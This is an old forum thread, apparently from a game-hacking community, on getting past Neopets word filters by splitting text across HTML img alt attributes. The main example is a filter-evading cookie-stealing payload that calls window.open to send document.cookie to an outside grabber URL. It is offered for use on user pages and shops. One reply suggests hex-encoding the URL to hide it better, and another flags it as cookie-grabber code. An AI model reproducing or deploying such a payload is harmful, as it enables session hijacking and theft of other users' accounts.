[HTML] Bypass Neopets Word Filters

Discussion in 'Code Snippets and Tutorials' started by Belaarx, Sep 25, 2008.

  1. Belaarx

    Belaarx Level I

    Joined:
    Sep 23, 2008
    Messages:
    135
    Likes Received:
    16
    Location:
    San Diego
    Here is a neat little trick I figured out a couple of days ago when I was messing around with some ideas on Userlookups on Neo. You are able to produce the following result using this trick:

    [​IMG]

    It is a super simple concept. All the trick is, is using the "alt" parameter for the "img" tag in HTML to escape the Neopets word filters. For example, if you wanted to type "shit", you could use the following code:

    Code (Text):
    1. <img src=".gif" alt="sh">it
    It will show your alt text if the image does not exist (Which it won't since you aren't using a real image location. To produce the result of the first image, use the following code:

    Code (Text):
    1. <img src=".gif" alt="jav"><img src=".gif" alt="asc"><img src=".gif" alt="rip"><img src=".gif" alt="t:"><img src=".gif" alt="win">dow<img src=".gif" alt=".op">en(<img src=".gif" alt="'http">://nastycger<img src=".gif" alt=".co">m/pp/hi<img src=".gif" alt=".jp">g<img src=".gif" alt="/index.">php?word='+<img src=".gif" alt="docume">nt<img src=".gif" alt=".">coo<img src=".gif" alt="kie">);
    (Note: It must be on one line to work!)

    • A few notes:
    • This works on userlookups, petpages, shop, and anywhere else where you can post HTML
    • You will only be able to get a text result due to the nature of the alt tag (You can't put this in a hyperlink

    Enjoy! :)
     
    ricky92 likes this.
  2. Cacklenub

    Cacklenub Level IV

    Joined:
    May 10, 2008
    Messages:
    1,345
    Likes Received:
    58
    I haven't tried this, but couldn't you just do <b>shi</b>t?? You could always just use css to make bold and regular the same too. I haven't tried but it could possibly work.
     
  3. Zer0

    Zer0 Level IV

    Joined:
    Mar 2, 2008
    Messages:
    3,037
    Likes Received:
    180
    Location:
    Home sweet home
    ROFL, very nice
    I'm not very fond of CGers but that's a cool trick :)
    You might want to hex encode the URL or some other kind of obfuscation for it to work more effectively. ;)

    (mods, I don't think we're allowed to talk about this kinda stuff? Perhaps edit the post above to take out the CG code and replace with simply a word filter bypass)